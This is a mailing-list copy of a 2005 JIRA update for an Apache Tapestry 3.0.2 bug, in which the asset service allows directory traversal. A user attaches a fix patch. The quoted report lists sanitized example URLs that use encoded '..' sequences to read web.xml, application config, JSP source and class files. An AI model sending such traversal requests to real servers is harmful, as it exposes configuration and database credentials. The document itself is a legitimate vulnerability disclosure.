You are viewing a plain text version of this content. The canonical link for it is here.

Posted to dev@tapestry.apache.org by "gustav spellauge (JIRA)" <ta...@jakarta.apache.org> on 2005/03/10 11:14:55 UTC

[jira] Updated: (TAPESTRY-278) Tapestry 3.0.2 asset service has security flaw

     [ http://issues.apache.org/jira/browse/TAPESTRY-278?page=history ]

gustav spellauge updated TAPESTRY-278:
--------------------------------------

    Attachment: AssetService.patch

here is a quick patch for version 3.0.2 (14.02.2005) which works for us.
maybe the list of exposed mimetypes needs to be extended.

> Tapestry 3.0.2 asset service has security flaw
> ----------------------------------------------
>
>          Key: TAPESTRY-278
>          URL: http://issues.apache.org/jira/browse/TAPESTRY-278
>      Project: Tapestry
>         Type: Bug
>   Components: Framework
>     Versions: 3.0.2
>  Environment: Tomcat 5, JDK 1.4
>     Reporter: Nathan Kopp
>  Attachments: AssetService.patch
>
> The asset service can be used to view files that should not be visible.  This could expose important resources, including database passwords and connection information.
> The asset service appears to expose any file relative to the classpath, and you can even use the ".." operator to go backwards, down into WEB-INF in general.
> Here are some examples.  They were tested on a demo application which is often available on the web, but they've been "cleaned," so they don't point to a real server anymore:
> * View the web.xml file:
> http://www.someserver.com/tapestry-app/app?service=asset&sp=S%2F..%2Fweb.xml
> * View the tapestry.application file:
> http://www.someserver.com/tapestry-app/app?service=asset&sp=S%2F..%2Ftapestry.application
> * View a raw JSP file:
> http://www.someserver.com/tapestry-app/app?service=asset&sp=S%2F..%2F..%2F404.jsp
> * Download a few class files that are part of the application:
> http://www.someserver.com/tapestry-app/app?service=asset&sp=S%2Forg%2Fappfuse%2Fweb%2FMessageFilter.class
> http://www.someserver.com/tapestry-app/app?service=asset&sp=S%2Forg%2Fappfuse%2Fweb%2FBaseEngine.class

-- 
This message is automatically generated by JIRA.
-
If you think it was sent incorrectly contact one of the administrators:
   http://issues.apache.org/jira/secure/Administrators.jspa
-
If you want more information on JIRA, or have a bug to report see:
   http://www.atlassian.com/software/jira


---------------------------------------------------------------------
To unsubscribe, e-mail: tapestry-dev-unsubscribe@jakarta.apache.org
For additional commands, e-mail: tapestry-dev-help@jakarta.apache.org